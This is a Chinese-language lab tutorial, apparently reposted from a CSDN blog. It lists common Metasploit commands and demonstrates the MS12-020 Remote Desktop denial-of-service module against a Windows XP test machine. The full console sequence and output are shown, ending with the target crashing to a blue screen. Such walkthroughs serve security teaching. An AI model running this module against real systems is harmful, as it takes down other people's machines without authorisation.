1.一些常用指令
msfconsole 打开控制台终端
msfupdate 更新
help [command] e.g. help search 命令使用帮助信息
search 查找可用攻击模块
use … 选择渗透攻击模块
show payloads 查看与该攻击模块相兼容的攻击载荷
set payload … 设置攻击载荷
set target 设置目标
show options 查看需要设置的配置参数
exploit 实施渗透攻击
back 返回上一级
metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploits
nmap <扫描选项><扫描目标>
作者:BigYellowHsw
来源:CSDN
原文:https://blog.csdn.net/bigyellowhsw/article/details/78482027
版权声明:本文为博主原创文章,转载请附上博文链接!
2.1 MS12-020漏洞利用演示实验
2.1.1 微软关于MS12-020漏洞的安全公告: http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020
2.1.2 实验准备工作
1、该漏洞利用远程桌面的漏洞进行攻击,所以需要靶机xp系统打开远程桌面功能。
2、检查确定渗透测试系统与靶机系统可以互相ping通。
2.1.3 实验步骤 1、渗透测试系统中,在终端输入msfconsole进入msf终端,接着在msf终端中使用search功能搜索ms12-020,发现有两个可用模块:
msf > search ms12-020
Matching Modules
Name Disclosure Date Rank Description
auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal MS12-020 Microsoft Remote Desktop Use-After-Free DoS
auxiliary/scanner/rdp/ms12_020_check normal MS12-020 Microsoft Remote Desktop Checker
2、使用use命令选定要利用的模块:
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids)
3、查看需要填写的参数,这里需要填写靶机ip。
msf auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
RHOST yes The target address
RPORT 3389 yes The target port
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.116.129
RHOST => 192.168.116.129
4、最后输入命令“run”,执行我们的auxiliary攻击模块:
msf auxiliary(ms12_020_maxchannelids) > run
[] 192.168.116.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[] 192.168.116.129:3389 - 210 bytes sent
[] 192.168.116.129:3389 - Checking RDP status…
[+] 192.168.116.129:3389 seems down
[] Auxiliary module execution completed
5、靶机系统受到攻击后蓝屏